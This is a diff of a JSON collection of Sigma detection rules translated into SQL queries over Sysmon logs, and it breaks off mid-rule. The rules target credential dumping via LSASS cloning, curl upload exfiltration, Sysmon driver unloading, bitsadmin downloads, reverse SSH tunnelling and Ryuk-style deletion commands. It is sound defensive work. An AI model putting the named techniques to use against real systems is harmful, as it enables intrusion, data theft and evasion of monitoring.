"rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\defaultpack.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe' ESCAPE '\\' AND IntegrityLevel = 'System')))" ], - "filename": "proc_creation_win_lolbin_defaultpack.yml" + "filename": "proc_creation_win_msiexec_install_quiet.yml" }, { - "title": "Suspicious Shells Spawn by Java Utility Keytool", - "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "title": "Arbitrary File Download Via MSPUB.EXE", + "id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", "status": "experimental", - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR OriginalFileName = 'MSPUB.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_keytool_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_mspub_download.yml" }, { - "title": "Suspicious Plink Port Forwarding", - "id": "48a61b29-389f-4032-b317-b30de6b95314", + "title": "Potential Encoded PowerShell Patterns In CommandLine", + "id": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", "status": "test", - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects specific combinations of encoding methods in PowerShell via the commandline", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (((CommandLine LIKE '%ToInt%' ESCAPE '\\' OR CommandLine LIKE '%ToDecimal%' ESCAPE '\\' OR CommandLine LIKE '%ToByte%' ESCAPE '\\' OR CommandLine LIKE '%ToUint%' ESCAPE '\\' OR CommandLine LIKE '%ToSingle%' ESCAPE '\\' OR CommandLine LIKE '%ToSByte%' ESCAPE '\\') AND (CommandLine LIKE '%ToChar%' ESCAPE '\\' OR CommandLine LIKE '%ToString%' ESCAPE '\\' OR CommandLine LIKE '%String%' ESCAPE '\\')) OR ((CommandLine LIKE '%char%' ESCAPE '\\' AND CommandLine LIKE '%join%' ESCAPE '\\') OR (CommandLine LIKE '%split%' ESCAPE '\\' AND CommandLine LIKE '%join%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_plink_port_forwarding.yml" + "filename": "proc_creation_win_powershell_encoding_patterns.yml" }, { - "title": "PUA - NirCmd Execution As LOCAL SYSTEM", - "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "title": "Sysmon Driver Unloaded Via Fltmc.EXE", + "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", "status": "test", - "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nircmd_as_system.yml" + "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" }, { - "title": "HackTool - SysmonEOP Execution", - "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "title": "Potential Binary Impersonating Sysinternals Tools", + "id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", "status": "experimental", - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "author": "frack113", "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AccessEnum.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADInsight.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADInsight64.exe' ESCAPE '\\' OR Image LIKE '%\\\\adrestore.exe' ESCAPE '\\' OR Image LIKE '%\\\\adrestore64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autologon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autologon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autoruns.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autoruns64.exe' ESCAPE '\\' OR Image LIKE '%\\\\autorunsc.exe' ESCAPE '\\' OR Image LIKE '%\\\\autorunsc64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bginfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bginfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Cacheset.exe' ESCAPE '\\' OR Image LIKE '%\\\\Cacheset64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Clockres.exe' ESCAPE '\\' OR Image LIKE '%\\\\Clockres64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Contig.exe' ESCAPE '\\' OR Image LIKE '%\\\\Contig64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Coreinfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\Coreinfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\CPUSTRES.EXE' ESCAPE '\\' OR Image LIKE '%\\\\CPUSTRES64.EXE' ESCAPE '\\' OR Image LIKE '%\\\\ctrl2cap.exe' ESCAPE '\\' OR Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\' OR Image LIKE '%\\\\dbgview64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktops.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktops64.exe' ESCAPE '\\' OR Image LIKE '%\\\\disk2vhd.exe' ESCAPE '\\' OR Image LIKE '%\\\\disk2vhd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskext.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskext64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Diskmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Diskmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\DiskView.exe' ESCAPE '\\' OR Image LIKE '%\\\\DiskView64.exe' ESCAPE '\\' OR Image LIKE '%\\\\du.exe' ESCAPE '\\' OR Image LIKE '%\\\\du64.exe' ESCAPE '\\' OR Image LIKE '%\\\\efsdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\FindLinks.exe' ESCAPE '\\' OR Image LIKE '%\\\\FindLinks64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\hex2dec.exe' ESCAPE '\\' OR Image LIKE '%\\\\hex2dec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\junction.exe' ESCAPE '\\' OR Image LIKE '%\\\\junction64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldmdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\listdlls.exe' ESCAPE '\\' OR Image LIKE '%\\\\listdlls64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrd.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrdC.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrdC64.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonsessions.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonsessions64.exe' ESCAPE '\\' OR Image LIKE '%\\\\movefile.exe' ESCAPE '\\' OR Image LIKE '%\\\\movefile64.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfault64.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfaultc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfaultc64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntfsinfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntfsinfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pendmoves.exe' ESCAPE '\\' OR Image LIKE '%\\\\pendmoves64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pipelist.exe' ESCAPE '\\' OR Image LIKE '%\\\\pipelist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\portmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Procmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Procmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psfile.exe' ESCAPE '\\' OR Image LIKE '%\\\\psfile64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psGetsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\psGetsid64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psInfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\psInfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pskill.exe' ESCAPE '\\' OR Image LIKE '%\\\\pskill64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pslist.exe' ESCAPE '\\' OR Image LIKE '%\\\\pslist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\psLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psping.exe' ESCAPE '\\' OR Image LIKE '%\\\\psping64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psService.exe' ESCAPE '\\' OR Image LIKE '%\\\\psService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psshutdown.exe' ESCAPE '\\' OR Image LIKE '%\\\\psshutdown64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\' OR Image LIKE '%\\\\RAMMap.exe' ESCAPE '\\' OR Image LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR Image LIKE '%\\\\RegDelNull.exe' ESCAPE '\\' OR Image LIKE '%\\\\RegDelNull64.exe' ESCAPE '\\' OR Image LIKE '%\\\\regjump.exe' ESCAPE '\\' OR Image LIKE '%\\\\ru.exe' ESCAPE '\\' OR Image LIKE '%\\\\ru64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ShareEnum.exe' ESCAPE '\\' OR Image LIKE '%\\\\ShareEnum64.exe' ESCAPE '\\' OR Image LIKE '%\\\\shellRunas.exe' ESCAPE '\\' OR Image LIKE '%\\\\sigcheck.exe' ESCAPE '\\' OR Image LIKE '%\\\\sigcheck64.exe' ESCAPE '\\' OR Image LIKE '%\\\\streams.exe' ESCAPE '\\' OR Image LIKE '%\\\\streams64.exe' ESCAPE '\\' OR Image LIKE '%\\\\strings.exe' ESCAPE '\\' OR Image LIKE '%\\\\strings64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sync.exe' ESCAPE '\\' OR Image LIKE '%\\\\sync64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpvcon.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpvcon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpview.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpview64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Testlimit.exe' ESCAPE '\\' OR Image LIKE '%\\\\Testlimit64.exe' ESCAPE '\\' OR Image LIKE '%\\\\vmmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\vmmap64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Volumeid.exe' ESCAPE '\\' OR Image LIKE '%\\\\Volumeid64.exe' ESCAPE '\\' OR Image LIKE '%\\\\whois.exe' ESCAPE '\\' OR Image LIKE '%\\\\whois64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Winobj.exe' ESCAPE '\\' OR Image LIKE '%\\\\Winobj64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ZoomIt.exe' ESCAPE '\\' OR Image LIKE '%\\\\ZoomIt64.exe' ESCAPE '\\') AND NOT ((Company IN ('Sysinternals - www.sysinternals.com', 'Sysinternals')) OR (Company = '')))" ], - "filename": "proc_creation_win_hktl_sysmoneop.yml" + "filename": "proc_creation_win_sysinternals_tools_masquerading.yml" }, { - "title": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", - "id": "47e4bab7-c626-47dc-967b-255608c9a920", - "status": "experimental", - "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords. This is seen being used in combination with \"icacls\" to look for misconfigured files or folders permissions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "MMC20 Lateral Movement", + "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "status": "test", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.execution", + "attack.t1021.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%\"Everyone\"%' ESCAPE '\\' OR CommandLine LIKE '%''Everyone''%' ESCAPE '\\' OR CommandLine LIKE '%\"BUILTIN\\\\\"%' ESCAPE '\\' OR CommandLine LIKE '%''BUILTIN\\\\''%' ESCAPE '\\')) OR (CommandLine LIKE '%icacls %' ESCAPE '\\' AND CommandLine LIKE '%findstr %' ESCAPE '\\' AND CommandLine LIKE '%Everyone%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" ], - "filename": "proc_creation_win_findstr_recon_everyone.yml" + "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" }, { - "title": "Potential Data Exfiltration Via Curl.EXE", - "id": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "title": "Potential Credential Dumping Via LSASS Process Clone", + "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "status": "test", - "description": "Detects the execution of the \"curl\" process with \"upload\" flags. Which might indicate potential data exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" ], "falsepositives": [ - "Scripts created by developers and admins" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_curl_fileupload.yml" + "filename": "proc_creation_win_susp_lsass_clone.yml" }, { - "title": "HackTool - RedMimicry Winnti Playbook Execution", - "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", - "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", - "author": "Alexander Rausch", + "title": "File With Suspicious Extension Downloaded Via Bitsadmin", + "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" }, { - "title": "HackTool - PurpleSharp Execution", - "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", - "status": "test", - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "author": "Florian Roth (Nextron Systems)", + "title": "Always Install Elevated Windows Installer", + "id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", + "status": "experimental", + "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "tags": [ - "attack.t1587", - "attack.resource_development" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "System administrator usage", + "Anti virus products", + "WindowsApps located in \"C:\\Program Files\\WindowsApps\\\"" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND Image LIKE '%msi%' ESCAPE '\\' AND Image LIKE '%tmp' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND IntegrityLevel = 'System')) AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Sophos\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR ((ParentImage LIKE 'C:\\\\Program Files\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE 'C:\\\\Program Files\\\\Google\\\\Update\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" + "filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml" }, { - "title": "Potential Ryuk Ransomware Activity", - "id": "c37510b8-2107-4b78-aa32-72f251e7a844", - "status": "stable", - "description": "Detects Ryuk ransomware activity", - "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Remote Desktop Tunneling", + "id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", + "status": "experimental", + "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.lateral_movement", + "attack.t1021" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine 